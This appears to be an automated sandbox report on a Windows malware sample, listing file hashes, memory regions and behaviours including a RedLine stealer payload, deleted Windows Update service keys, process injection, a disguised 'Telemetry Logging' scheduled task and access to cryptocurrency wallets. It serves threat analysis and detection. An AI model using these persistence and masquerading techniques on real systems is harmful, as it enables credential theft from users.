| SHA512 | 20dbe4dd2e1a830ba822b19589d3b42cd43382837d46b7ba58e3f36e6cd6bf39a489b705d28b7a1ddfb02039e91b9e1220f03e2fe46b71ce92101bcdb30887f1 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1120-107-0x0000000000000000-mapping.dmp
memory/936-108-0x0000000000000000-mapping.dmp
memory/1628-109-0x000007FEF3670000-0x000007FEF4093000-memory.dmp
memory/1628-110-0x000007FEF2B10000-0x000007FEF366D000-memory.dmp
memory/1588-111-0x0000000000000000-mapping.dmp
memory/1628-112-0x0000000002344000-0x0000000002347000-memory.dmp
memory/1628-113-0x000000000234B000-0x000000000236A000-memory.dmp
memory/1716-114-0x0000000000000000-mapping.dmp
memory/1712-115-0x0000000000000000-mapping.dmp
memory/1068-116-0x0000000000000000-mapping.dmp
memory/1872-117-0x0000000000000000-mapping.dmp
memory/1596-118-0x0000000000000000-mapping.dmp
memory/1372-119-0x0000000000000000-mapping.dmp
memory/1628-120-0x0000000002344000-0x0000000002347000-memory.dmp
memory/1628-121-0x000000000234B000-0x000000000236A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1428-123-0x0000000140001938-mapping.dmp
memory/1824-124-0x0000000001F10000-0x0000000002414000-memory.dmp
memory/1264-125-0x0000000000000000-mapping.dmp
memory/656-126-0x0000000000000000-mapping.dmp
memory/1824-129-0x0000000001D20000-0x0000000001E5D000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1264-131-0x000007FEF4010000-0x000007FEF4A33000-memory.dmp
memory/1264-132-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp
memory/1264-133-0x00000000011C4000-0x00000000011C7000-memory.dmp
memory/656-134-0x0000000071330000-0x00000000718DB000-memory.dmp
memory/1264-135-0x00000000011CB000-0x00000000011EA000-memory.dmp
memory/1264-136-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1264-137-0x0000000076F10000-0x000000007702F000-memory.dmp
memory/1264-138-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/864-139-0x0000000140000000-0x0000000140029000-memory.dmp
memory/864-140-0x0000000140002314-mapping.dmp
memory/864-144-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1264-143-0x00000000011C4000-0x00000000011C7000-memory.dmp
memory/864-145-0x0000000076F10000-0x000000007702F000-memory.dmp
memory/864-142-0x0000000140000000-0x0000000140029000-memory.dmp
memory/420-146-0x0000000000820000-0x0000000000841000-memory.dmp
memory/420-150-0x0000000037170000-0x0000000037180000-memory.dmp
memory/420-149-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/864-154-0x0000000140000000-0x0000000140029000-memory.dmp
memory/464-153-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/864-155-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/464-156-0x0000000037170000-0x0000000037180000-memory.dmp
memory/480-161-0x0000000037170000-0x0000000037180000-memory.dmp
memory/420-165-0x0000000000850000-0x0000000000877000-memory.dmp
memory/488-170-0x00000000001F0000-0x0000000000217000-memory.dmp
memory/716-182-0x0000000037170000-0x0000000037180000-memory.dmp
memory/792-184-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/716-181-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/660-180-0x0000000037170000-0x0000000037180000-memory.dmp
memory/660-179-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/584-177-0x0000000037170000-0x0000000037180000-memory.dmp
memory/584-176-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/480-169-0x0000000000070000-0x0000000000097000-memory.dmp
memory/488-167-0x0000000037170000-0x0000000037180000-memory.dmp
memory/464-166-0x00000000000F0000-0x0000000000117000-memory.dmp
memory/488-164-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/480-160-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/420-158-0x0000000000820000-0x0000000000841000-memory.dmp
memory/792-248-0x0000000037170000-0x0000000037180000-memory.dmp
memory/828-251-0x0000000037170000-0x0000000037180000-memory.dmp
memory/1028-255-0x00000000001B0000-0x00000000001D7000-memory.dmp
memory/1392-259-0x0000000002A20000-0x0000000002A47000-memory.dmp
memory/2004-263-0x0000000037170000-0x0000000037180000-memory.dmp
memory/1700-266-0x0000000000330000-0x0000000000357000-memory.dmp
memory/864-265-0x0000000000DC0000-0x0000000000DE7000-memory.dmp
memory/1320-264-0x0000000000AA0000-0x0000000000AC7000-memory.dmp
memory/2004-262-0x0000000000490000-0x00000000004B7000-memory.dmp
memory/1612-261-0x0000000000780000-0x00000000007A7000-memory.dmp
memory/1128-260-0x00000000001E0000-0x0000000000207000-memory.dmp
memory/1780-258-0x0000000000470000-0x0000000000497000-memory.dmp
memory/1240-257-0x0000000001C80000-0x0000000001CA7000-memory.dmp
memory/1336-256-0x0000000000170000-0x0000000000197000-memory.dmp
memory/276-254-0x0000000001C00000-0x0000000001C27000-memory.dmp
memory/868-253-0x0000000037170000-0x0000000037180000-memory.dmp
memory/868-252-0x00000000004B0000-0x00000000004D7000-memory.dmp
memory/828-250-0x00000000008F0000-0x0000000000917000-memory.dmp
memory/296-249-0x0000000000BE0000-0x0000000000C07000-memory.dmp
memory/792-247-0x00000000007E0000-0x0000000000807000-memory.dmp
memory/716-246-0x0000000000910000-0x0000000000937000-memory.dmp
memory/660-245-0x0000000000310000-0x0000000000337000-memory.dmp
memory/584-244-0x0000000000400000-0x0000000000427000-memory.dmp
memory/656-243-0x0000000071330000-0x00000000718DB000-memory.dmp
memory/1264-267-0x00000000011CB000-0x00000000011EA000-memory.dmp
memory/1264-269-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1264-270-0x0000000076F10000-0x000000007702F000-memory.dmp
memory/1824-271-0x000000000EA00000-0x000000000EA57000-memory.dmp
memory/864-272-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1700-273-0x0000000000330000-0x0000000000357000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/1596-277-0x0000000000000000-mapping.dmp
memory/1524-283-0x0000000037170000-0x0000000037180000-memory.dmp
memory/1824-284-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/1524-282-0x0000000001A30000-0x0000000001A57000-memory.dmp
memory/1660-290-0x00000000001A0000-0x00000000001C7000-memory.dmp
memory/1660-289-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Windows\System32\Tasks\Telemetry Logging
| MD5 | c06f2d1947ad604f393a07dc6f001b3d |
| SHA1 | fb4063ffe535716bc7ef8e2ae1556678a83b6729 |
| SHA256 | e31537d7c912142191d592ec7284e0ab2281dc865ef69a8036997dea93bd94f5 |
| SHA512 | 15f3dfff619b303be430f3e93a5755b7d71d4da0739672543af7d9624d247b8ca92c354fe7a25f3417dfa99b99d52630d0f39608189f5706b3c133625fddb871 |
memory/1100-296-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-28 19:33
Reported
2023-01-28 19:36
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
105s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2944 created 3216 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 4392 created 2908 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 4536 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 3768 created 3216 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 3768 created 2908 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1180 set thread context of 1604 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 4800 set thread context of 4568 | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 3316 set thread context of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 4536 set thread context of 4920 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
